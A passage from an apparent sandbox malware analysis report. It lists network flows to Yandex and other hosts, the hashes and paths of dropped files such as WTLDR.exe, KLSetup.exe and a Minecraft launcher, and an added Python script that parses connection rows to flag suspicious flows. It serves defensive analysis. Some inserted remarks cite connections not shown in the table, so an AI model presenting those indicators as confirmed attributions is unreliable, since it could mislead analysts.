RU 213.180.204.158:443 - tcp
RU 213.180.204.158:443 - tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.4.4:443 dns.google udp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 87.250.254.20:443 soft.export.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.204.158:443 - tcp
RU 77.88.55.242:443 - tcp
RU 5.255.255.77:443 yandex.ru tcp
RU 77.88.21.37:443 - tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 5.255.255.77:443 yandex.ru tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 93.158.134.121:443 browser.yandex.ru tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 - tcp
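The table above is a flattened connection log: one line per observed flow in the form country, ip:port, domain, protocol, with the Domain column empty when the sample connected to an address without a preceding DNS lookup (88.168.211.65:6522 twice, several Yandex addresses on 443). The following is an added example, not part of the sandbox report, that parses rows in exactly this layout and pulls out what an analyst wants first: direct-IP connections, ports outside the usual set, names that were resolved but never contacted (www.microsoft.com on this page), and which addresses actually served each resolved name, which separates the bulk Yandex CDN and browser traffic from the klaun.ch and direct-IP flows. SAMPLE_ROWS is a constructed subset copied from the table; COMMON_PORTS and the heuristics are the example's own assumptions. The report does not attribute 88.168.211.65:6522 to any particular process, so treat that destination as a lead to confirm against the process tree, not as a finding.

```python
"""Parse a sandbox 'Network' table and extract the connections to pivot on.

Added example, not code from the original report. Row layout, as on this page:
"<country> <ip>:<port> [<domain>] <proto>"; the domain is absent (or "-") when
the sample connected straight to an address with no DNS lookup.
"""
import ipaddress
import re
from collections import Counter, defaultdict

# Rows copied from the table above: a constructed subset, not the full listing.
SAMPLE_ROWS = """\
US 8.8.8.8:53 temp.sh udp
FR 51.91.79.17:443 temp.sh tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
FR 88.168.211.65:6522 tcp
US 8.8.8.8:53 api.klaun.ch udp
US 104.26.11.58:80 api.klaun.ch tcp
FR 88.168.211.65:6522 tcp
US 8.8.8.8:53 www.microsoft.com udp
N/A 224.0.0.251:5353 udp
RU 213.180.204.158:443 tcp
US 104.26.10.58:443 repos.klaun.ch tcp
"""

ROW_RE = re.compile(
    r"^(?P<country>\S+)\s+(?P<ip>[0-9.]+):(?P<port>\d+)"
    r"(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$"
)

# Assumption of this example: ports whose presence alone says nothing.
COMMON_PORTS = {53, 80, 443, 5353}


def parse_rows(text):
    """Turn the flattened table into dicts; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["port"] = int(row["port"])
        if row["domain"] == "-":          # explicit placeholder for an empty column
            row["domain"] = None
        rows.append(row)
    return rows


def is_dns_query(row):
    return row["proto"] == "udp" and row["port"] == 53


def direct_ip_connections(rows):
    """Destinations contacted with no hostname, ignoring local multicast (mDNS)."""
    hits = {
        (r["ip"], r["port"])
        for r in rows
        if r["domain"] is None and not ipaddress.ip_address(r["ip"]).is_multicast
    }
    return sorted(hits)


def nonstandard_ports(rows):
    """(ip, port) pairs on ports outside COMMON_PORTS."""
    return sorted({(r["ip"], r["port"]) for r in rows if r["port"] not in COMMON_PORTS})


def dns_only_domains(rows):
    """Names that were resolved but never connected to over tcp/udp."""
    queried = {r["domain"] for r in rows if is_dns_query(r) and r["domain"]}
    contacted = {r["domain"] for r in rows if not is_dns_query(r) and r["domain"]}
    return sorted(queried - contacted)


def hosts_by_domain(rows):
    """Addresses that actually served traffic for each resolved name."""
    out = defaultdict(set)
    for r in rows:
        if r["domain"] and not is_dns_query(r):
            out[r["domain"]].add(r["ip"])
    return {name: sorted(ips) for name, ips in out.items()}


def connection_counts(rows):
    """Hits per (ip, port); repeated direct-IP hits are the beaconing candidates."""
    return Counter((r["ip"], r["port"]) for r in rows if not is_dns_query(r))


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    print("direct-IP:", direct_ip_connections(rows))
    print("non-standard ports:", nonstandard_ports(rows))
    print("resolved but never contacted:", dns_only_domains(rows))
    for name, ips in hosts_by_domain(rows).items():
        print(f"{name}: {', '.join(ips)}")
```

Feed the whole table to parse_rows to get the full picture; the parser accepts both the bare three-column rows and rows with a "-" placeholder in the Domain column, so it works on either form of the listing.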

Files

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3NPBB818\vmware[1].exe

MD5 68e634af1eafb17618018de02dd47be7
SHA1 bdc653c130d96a32edeb4f2bc48203432b448498
SHA256 2d316619d2522838df93cbb8392c4c3a053279d92e586ccd63431cadfbe7816d
SHA512 8220a64c8f89d0c30d42e5bfcf770a26422604ea37f48fbcade5679f42bfb474966203cb5bbd2f29f51e435f7f8e04e168e112b2ed3eb419a46536aa7b947071

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1c866d99680e5d3cc1b81b0ad62cc29d
SHA1 4b6b656666f07231cf98fc415a56155e07bc9655
SHA256 e53d9a6ff48c2a0eac3c691d98190ad19121f70fac3e6f779aa768d2d2437d61
SHA512 a207a31c97e80b8103e963379a98c08cdbbc2d1e9fecac5e08e9964a9245a8946855fd928e908dc9c9488f0d94088c713fd31dd26cea6a19a9909a48fb6d6433

C:\Users\Admin\AppData\Local\Temp\Cab3E4B.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\Tar3E4C.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar3F3C.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 623996f9b4b239d36951ebb24bbda141
SHA1 af935d13686860cbcbda027452a50caead31c46c
SHA256 cfde8ba2715963fb5a0c488a482dca80a9a2d29eefda87886b428f74eeb7e48c
SHA512 c3991fdfe5aef3a5f37c54ef8720a1b54b5fab5b36ca06c301021e98f6498a7ec1c2130560006e0da69954e1b1c869cacf5e1b95c7af2bc49ebc9b76fe6c0131

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d3624f2d6c19b66b3dc65c654b02f1fe
SHA1 58b5d3d245f21b64651ba6bba51025e036d2f3f3
SHA256 ec2675017aed3f84812908f1fc35d71c53371235a247a7b71c6f0660ff5f549e
SHA512 ad67c7c6b61908bb05782df01e86c40b9f03550ea52ff8c365e1706ce846af58de3ae33fb10ef42d6c932346996dc0fcf3530042327d8679b83b494f61423dad

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f2a93aa1bbce9ba296079e1efaccee72
SHA1 da015b38f0740ff8e907b461ec530b9eccafac78
SHA256 e95ee5e12cd21523e687acb83f31f104138eba45569a1a739507018ba006c22c
SHA512 b29a2ff38bb4221f3a2072a60d345e22df17cd67511e43b9dd34c2bc900c9a5400d38fc77d88a2f8e679d73ecdbca5d2103b11dd779a5eee4f4889881ac72794

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a15677bfb3bf3b4342626021928d97b0
SHA1 bfbc76cd6c3b52abdc647bcb4673e895a1c5e817
SHA256 ed548c122c899c5d672bf51b06be55a26fccb81bc05394ac7173e081ea25e97c
SHA512 4b1fad11b8e6375f23c0356861dcf145d4dbf97729562a30f84e20857d0350016b5ad787325bce113c8c1ee27b4ec0cc43ca680793157ec73490d8de04c5f4d3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e2c3d90efc0e60add4a80bb4a0ac08bc
SHA1 03add7f2c02ff0bfae766840ec4dd007744678cd
SHA256 cb763a7329d69b15bb62277665d346149041fa5bd3185517550a8b35da2e4442
SHA512 95ef6a129d44f86debb47f6b98aecb22082c64893e1c407d82114867dac3a4fe92c09e1a1da63129a554fd9b9a2e6139e20e3d3f27502db73c70801aa2f37edc

memory/1488-244-0x000007FEF5463000-0x000007FEF5464000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 06a9456e467382df18a3593e4d54af7e
SHA1 e36aa1c7c17b12d8007149dfd10660a3eccee341
SHA256 2c39a8e836cf8d79fcde99af816da33866321879eace0406fd8da603ea5738fa
SHA512 d27c67eed7cb6a2cc308c36cab14b292e6cde4a212fb57c4aa21d4e39a8d3960a556cb8c805464c2c2441f649e3badbfbe2e712c06fd04532d3f32a7a6c2218f

memory/1488-284-0x0000000000EE0000-0x00000000012B0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d4038df035884a5a9e9c824962d2bd9d
SHA1 c4e9f26c16ebaedacc729d083be5f1dfd74ab872
SHA256 5e748bdbdb926a837cea26b54583e5713639be3c43c495b3c59ef551a46a0116
SHA512 7299c73cd961fbd5fd9fc0bfe74073470f7e0651a545923ba1ccd9b3a86ad9b10e2f2a53c948e45c3a725aefe915eff50ad40d39f41d7b1d017ea2fdf7ea1671

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 95e4038bb791bea26477f52ccf8c74fc
SHA1 cc008ceee8193f6466470212a8c1f478c79ccadc
SHA256 b03637a86350e68440e5b342645c4e3f81e746003e032d9d483e97cde40d672c
SHA512 b628d1588302295cd135b2578003333a0e451cc9dd8cfa17d2f4baae6ac6e7cd2f3465e634d9212d7a1e450e4f58913dfb189909a5ee7453c4c8037f9a9eaa51

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 75bfae8ac53ea2d187c724861cba20e5
SHA1 c41956c2d657962d7135a44fabc6f901da716d00
SHA256 051181488ddd0876f6f938f9268a8edb78b7f9aa61eb26568e8e308dddfd50b2
SHA512 e3842cc4803deacabea378240cdd2c4312402aa5472e5dcc307e33e58a9573df0794267a7316147b2cc7d925a8370216667992c19645ccc019a213f92ccb9f68

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5eec5b74a5d2731b6004246f221e63f7
SHA1 51dc88984534c5c550f4b01329253ea555c546fa
SHA256 36f7059bb93937205386db37273a2d7c8eef9cc8ebf489fd309d3bb329431125
SHA512 0fbe207214a37c2e671eca4b5e88f493ca7aadad633bc9ab4b57768ff7d1ae0ec948d7e43a3b9e396fea529ffb666730db458e7d23635938534933743027d43f

memory/1488-506-0x000007FEF5460000-0x000007FEF5E4C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WTLDR.exe

MD5 7a94013c17dc892cea16fbae38646e43
SHA1 8cf54c2ac961dd5c82cb3b07c3de317847aa94bb
SHA256 cd35af0a0c71c382760409b7b2343c83857d89af55a0b365b72962f0f9c9a400
SHA512 03df47db51270ca87172620e5475ce7a99e1fa1bd61e1956e4a0b28792d145b4e30d5b0d7b0737ea3ed331cecaecde78641b4828b1b9425153b1f9ac3de6f34a

C:\Users\Admin\AppData\Local\Temp\KLSetup.exe

MD5 65f0ee72fac85b324a0734053d436918
SHA1 796d3ab9803f5e6ec370ff948f654842af62fd25
SHA256 4f128c759e90606c9c7b5546259a7888b2aaaf5ea59d1aa40d5284056366504c
SHA512 b18d612652d2023b7ca49bf0008d6f6a77bab25c70fb9d67bd29c4a917344275c2fbe14058e8121e0ec3e2278ae100b66e49494aa63a2d2570d7d95b6c64ed52

memory/1488-518-0x000007FEF5460000-0x000007FEF5E4C000-memory.dmp

memory/2156-519-0x00000000003A0000-0x00000000003E0000-memory.dmp

memory/1568-527-0x0000000000A00000-0x0000000001245000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yadl.exe

MD5 2b0d2f77d8abade07a3dd9a8152ad111
SHA1 e7c0ad498f361e3c2d5a0ffa225ee112ed3c5bdb
SHA256 85ddc30b6b53ebe529688528e74bcfd74df0b93ea29ee1693d7d9aeec4d48776
SHA512 d48a3b9d9d3f83f1b0498103ee1f78467dc84254c762227081ba3218bd2212c1e3c29d2d94737101d55f5793f3d7dca8bdedc7d527cdb701733a6cbc74c938fc

memory/1568-556-0x0000000000A00000-0x0000000001245000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 523613f4e726830e6120c14ad5bfed22
SHA1 d39d221ea8a17155dca036d978f4d9a9853c286c
SHA256 d53a32e1246771ec2f6ad2c3ce6f718dfa317109775a73174aebd86f739299c5
SHA512 4f28b2628249b999b79203969b08ea2130fc29fbe84237aa12c81c51970f6304d3264f32fb9b9b34ab5d277c3f0e8428345c35326e8fec9686c11a9603670425

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 fe05b740f8a42c496e25440665d0d3f1
SHA1 939a623260bd0a77896d71d57e231eb64256454a
SHA256 4a438ee4662260d9bad67d9ed4fe2de67edfada3eed01704c7098d1f74eba993
SHA512 7b8be23516ee4071fd3a589466a07536ec82c7b520af90d6ff33c02ad186dfc2d7dbd13ad389e0c717cc5cb1d64caa7c364ca6206938ff002c71265d557d73cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ce0358034ad0d9e9e6b694595d9b6aa
SHA1 e5c2a89e2230fa220f9fde10feb86724e6ac9b6c
SHA256 b60b8ee859546b65e280c798830fe64f91ab6e365c9a81b1f4de5939ccdb4370
SHA512 6e29e8fb2b6c440e975c2394272eb9de781e24a0ee0c5b4195fee227744cee57a870bf04cfc145fff94b06a4f3a4a0bf6633ab76e199be926663376daed25127

C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe

MD5 3fb846d3691f3d98a34e669e1b9b5bf6
SHA1 4c90c2912aae3b8da4c44a4faa0b8df20525285f
SHA256 ead7a779cabae642d09be07283cc99e53c84ecf90349444e0d0ac4bf9901fe47
SHA512 e904ecfa7b1c9ba066272bf91b8341bf3877310613370defabee7db58ea825c52582353e97f9398d706d3f3890b3701a1c05fe202e8a87499fb9600f87176b3e

C:\Users\Admin\AppData\Local\Temp\YandexSearch00000.log

MD5 966b237be74cd73151e8bf351e98668d
SHA1 ff79c524c53895e7ca4b531da5fd43978d190557
SHA256 6fc21d359d992c40dc8e4c6565a5019fc75057585a201f345d1338a3995e08c9
SHA512 db04b7f03d346870753ff3486e4981019be5d7e3bc1b1304f2ff85674afe1fd833de0347ab8480c909e7189ac31800ce43daecdec2f91d987e255cfdac3196a0

C:\Users\Admin\AppData\Local\Temp\{5B964E0E-B9A3-4276-9ED9-4D5A5720747A}\YandexSearch.msi

MD5 561f202d40eb1a21aa947b2b833f6928
SHA1 b48e2f49a416847aa9420ed4b360841e8c28f67b
SHA256 b2fda5fb2d8e65fc0448d308647d8afd1e4ecd7bff0103ec3700e0798a7db0a3
SHA512 66d172f336ef0b4790e2141711f205682a0ba6ced8d03f26e33b54f6ea1e29be10d387e843df26d1110559888b09a3cdf9198ea40f17ca9d2ac1872c1da82063

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4ef79103cc1af90c6e30132516972044
SHA1 1e45c1db681a0a959578f18167d4064e511c77d9
SHA256 5218e58bb49a72454a74bc44c054eb1ddfb596a95e0111b89c6967e4375f7a52
SHA512 52dabd7b42e1696fa6e9a662a2ebfabc5012e0d11a3c6b92b9170b183ae42d247a18af6acd2f6d9568338fe50305eb90e02934133be6ecca12b7d82f56d7ed61

memory/1568-795-0x0000000000A00000-0x0000000001245000-memory.dmp

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\plugin2\msvcp140.dll

MD5 bf78c15068d6671693dfcdfa5770d705
SHA1 4418c03c3161706a4349dfe3f97278e7a5d8962a
SHA256 a88b8c1c8f27bf90fe960e0e8bd56984ad48167071af92d96ec1051f89f827fb
SHA512 5b6b0ab4e82cc979eaa619d387c6995198fd19aa0c455bef44bd37a765685575d57448b3b4accd70d3bd20a6cd408b1f518eda0f6dae5aa106f225bee8291372

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\vcruntime140.dll

MD5 7415c1cc63a0c46983e2a32581daefee
SHA1 5f8534d79c84ac45ad09b5a702c8c5c288eae240
SHA256 475ab98b7722e965bd38c8fa6ed23502309582ccf294ff1061cb290c7988f0d1
SHA512 3d4b24061f72c0e957c7b04a0c4098c94c8f1afb4a7e159850b9939c7210d73398be6f27b5ab85073b4e8c999816e7804fef0f6115c39cd061f4aaeb4dcda8cf

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\vcruntime140_1.dll

MD5 fcda37abd3d9e9d8170cd1cd15bf9d3f
SHA1 b23ff3e9aa2287b9c1249a008c0ae06dc8b6fdf2
SHA256 0579d460ea1f7e8a815fa55a8821a5ff489c8097f051765e9beaf25d8d0f27d6
SHA512 de8be61499aaa1504dde8c19666844550c2ea7ef774ecbe26900834b252887da31d4cf4fb51338b16b6a4416de733e519ebf8c375eb03eb425232a6349da2257

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\deploy\messages_zh_TW.properties

MD5 880baacb176553deab39edbe4b74380d
SHA1 37a57aad121c14c25e149206179728fa62203bf0
SHA256 ff4a3a92bc92cb08d2c32c435810440fd264edd63e56efa39430e0240c835620
SHA512 3039315bb283198af9090bd3d31cfae68ee73bc2b118bbae0b32812d4e3fd0f11ce962068d4a17b065dab9a66ef651b9cb8404c0a2defce74bb6b2d1d93646d5

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\images\cursors\win32_CopyNoDrop32x32.gif

MD5 1e9d8f133a442da6b0c74d49bc84a341
SHA1 259edc45b4569427e8319895a444f4295d54348f
SHA256 1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b
SHA512 63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\security\policy\unlimited\US_export_policy.jar

MD5 12f971b6e65cbc7184701235469f0339
SHA1 06cb165157c5e0078b872c48707a1328b1dcba19
SHA256 84e035372ca8979bb4a387428a74942ffc7248a0e61988b7033b5b266cd187c8
SHA512 58646fc81de2e4750a3259d79a207a8cff2dc6692f178a63d92a453fc408c8d1088007ef4e93157d1017be706565716a0236039dbac848c40745a0ad89c4d0de

\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe

MD5 82345958a39e7b1ad0b14ff2adeecaf9
SHA1 56e29f91f3ca1d5a3712e339ea5ac70f2904fbf7
SHA256 5fdc5fd46f4fbd5f1377c9cde1370b34bef76aec16f7ac3bcb89a1ee59329f99
SHA512 1182da48e1be07c2b21036336446e4af55dfc4f4fd1602701cf2a2c56ead437d9be5d994948f7b863215cffe1b627ff4331e4635db12f9eaf9d6ea7b6bf98ea2

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.dll

MD5 583e8b42864ec183c945164f373cb375
SHA1 5ec118befbb5d17593a05db2899ee52f7267da37
SHA256 9bc9178d3f4246433fe209a0f5ca70e77568e80c928268c78f8c8b00107ce6ed
SHA512 1feaac37bac19bde93171ebda2e76a65e9d5472a503b05939f6977b3a4d94d131298f3989dd048d7617ecd69cf09db7ac986fc39f0df9f56c84ea01726d0c898

\Windows\Installer\MSIE202.tmp

MD5 0c80a997d37d930e7317d6dac8bb7ae1
SHA1 018f13dfa43e103801a69a20b1fab0d609ace8a5
SHA256 a5dd2f97c6787c335b7807ff9b6966877e9dd811f9e26326837a7d2bd224de86
SHA512 fe1caef6d727344c60df52380a6e4ab90ae1a8eb5f96d6054eced1b7734357ce080d944fa518cf1366e14c4c0bd9a41db679738a860800430034a75bb90e51a5

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\ucrtbase.DLL

MD5 849959a003fa63c5a42ae87929fcd18b
SHA1 d1b80b3265e31a2b5d8d7da6183146bbd5fb791b
SHA256 6238cbfe9f57c142b75e153c399c478d492252fda8cb40ee539c2dcb0f2eb232
SHA512 64958dabdb94d21b59254c2f074db5d51e914ddbc8437452115dff369b0c134e50462c3fdbbc14b6fa809a6ee19ab2fb83d654061601cc175cddcb7d74778e09

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-processthreads-l1-1-1.dll

MD5 7e8b61d27a9d04e28d4dae0bfa0902ed
SHA1 861a7b31022915f26fb49c79ac357c65782c9f4b
SHA256 1ef06c600c451e66e744b2ca356b7f4b7b88ba2f52ec7795858d21525848ac8c
SHA512 1c5b35026937b45beb76cb8d79334a306342c57a8e36cc15d633458582fc8f7d9ab70ace7a92144288c6c017f33ecfc20477a04432619b40a21c9cda8d249f6d

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-file-l2-1-0.dll

MD5 721b60b85094851c06d572f0bd5d88cd
SHA1 4d0ee4d717aeb9c35da8621a545d3e2b9f19b4e7
SHA256 dac867476caa42ff8df8f5dfe869ffd56a18dadee17d47889afb69ed6519afbf
SHA512 430a91fcecde4c8cc4ac7eb9b4c6619243ab244ee88c34c9e93ca918e54bd42b08aca8ea4475d4c0f5fa95241e4aacb3206cbae863e92d15528c8e7c9f45601b

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-timezone-l1-1-0.dll

MD5 91a2ae3c4eb79cf748e15a58108409ad
SHA1 d402b9df99723ea26a141bfc640d78eaf0b0111b
SHA256 b0eda99eabd32fefecc478fd9fe7439a3f646a864fdab4ec3c1f18574b5f8b34
SHA512 8527af610c1e2101b6f336a142b1a85ac9c19bb3af4ad4a245cfb6fd602dc185da0f7803358067099475102f3a8f10a834dc75b56d3e6ded2ed833c00ad217ed

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-stdio-l1-1-0.dll

MD5 55b2eb7f17f82b2096e94bca9d2db901
SHA1 44d85f1b1134ee7a609165e9c142188c0f0b17e0
SHA256 f9d3f380023a4c45e74170fe69b32bca506ee1e1fbe670d965d5b50c616da0cb
SHA512 0cf0770f5965a83f546253decfa967d8f85c340b5f6ea220d3caa14245f3cdb37c53bf8d3da6c35297b22a3fa88e7621202634f6b3649d7d9c166a221d3456a5

memory/1568-2033-0x0000000000A00000-0x0000000001245000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\vendor00000.xml

MD5 a96e6071a17b74bbd309bf696496b8f7
SHA1 63c1ecf860504d390b6f3a32982ddd8946b042c5
SHA256 1a855972dc308e47d30d567e1b37fdad349bf555b971bc14ead76e17a8accccc
SHA512 2c906e2f11d62d1336be482cc5ff784bf372cc7afb3263754e7810a1ae27e253aa9e22463456b62a25049d33ba1e69f129ed7e0a0273fe928dcaa216b7876449

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-convert-l1-1-0.dll

MD5 4ec4790281017e616af632da1dc624e1
SHA1 342b15c5d3e34ab4ac0b9904b95d0d5b074447b7
SHA256 5cf5bbb861608131b5f560cbf34a3292c80886b7c75357acc779e0bf98e16639
SHA512 80c4e20d37eff29c7577b2d0ed67539a9c2c228edb48ab05d72648a6ed38f5ff537715c130342beb0e3ef16eb11179b9b484303354a026bda3a86d5414d24e69

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-string-l1-1-0.dll

MD5 9b79965f06fd756a5efde11e8d373108
SHA1 3b9de8bf6b912f19f7742ad34a875cbe2b5ffa50
SHA256 1a916c0db285deb02c0b9df4d08dad5ea95700a6a812ea067bd637a91101a9f6
SHA512 7d4155c00d65c3554e90575178a80d20dc7c80d543c4b5c4c3f508f0811482515638fe513e291b82f958b4d7a63c9876be4e368557b07ff062961197ed4286fb

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-heap-l1-1-0.dll

MD5 8906279245f7385b189a6b0b67df2d7c
SHA1 fcf03d9043a2daafe8e28dee0b130513677227e4
SHA256 f5183b8d7462c01031992267fe85680ab9c5b279bedc0b25ab219f7c2184766f
SHA512 67cac89ae58cc715976107f3bdf279b1e78945afd07e6f657e076d78e92ee1a98e3e7b8feae295af5ce35e00c804f3f53a890895badb1eed32377d85c21672b9

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-file-l1-2-0.dll

MD5 5a72a803df2b425d5aaff21f0f064011
SHA1 4b31963d981c07a7ab2a0d1a706067c539c55ec5
SHA256 629e52ba4e2dca91b10ef7729a1722888e01284eed7dda6030d0a1ec46c94086
SHA512 bf44997c405c2ba80100eb0f2ff7304938fc69e4d7ae3eac52b3c236c3188e80c9f18bda226b5f4fde0112320e74c198ad985f9ffd7cea99aca22980c39c7f69

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-core-localization-l1-2-0.dll

MD5 1ed0b196ab58edb58fcf84e1739c63ce
SHA1 ac7d6c77629bdee1df7e380cc9559e09d51d75b7
SHA256 8664222823e122fca724620fd8b72187fc5336c737d891d3cef85f4f533b8de2
SHA512 e1fa7f14f39c97aaa3104f3e13098626b5f7cfd665ba52dcb2312a329639aaf5083a9177e4686d11c4213e28acc40e2c027988074b6cc13c5016d5c5e9ef897b

\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\api-ms-win-crt-runtime-l1-1-0.dll

MD5 f1a23c251fcbb7041496352ec9bcffbe
SHA1 be4a00642ec82465bc7b3d0cc07d4e8df72094e8
SHA256 d899c2f061952b3b97ab9cdbca2450290b0f005909ddd243ed0f4c511d32c198
SHA512 31f8c5cd3b6e153073e2e2edf0ca8072d0f787784f1611a57219349c1d57d6798a3adbd6942b0f16cef781634dd8691a5ec0b506df21b24cb70aee5523a03fd9

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\server\jvm.dll

MD5 36e3e370db5f0b66689811b41f1a8445
SHA1 7fcbe290c3a6a0827b77af78115a1b4bc834d685
SHA256 9f28a06990d2ed1d14130072109e37e733b3a7d4922e325e679dd4d917741550
SHA512 f93bc4ca946e383ee1edfef3c7b5574585d23d660a4cc3db5b6b203f6111a3fe1f245d583ca53852888ac67812fb6efd0d121d0643180875baeb0d7b811d4db9

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\amd64\jvm.cfg

MD5 499f2a4e0a25a41c1ff80df2d073e4fd
SHA1 e2469cbe07e92d817637be4e889ebb74c3c46253
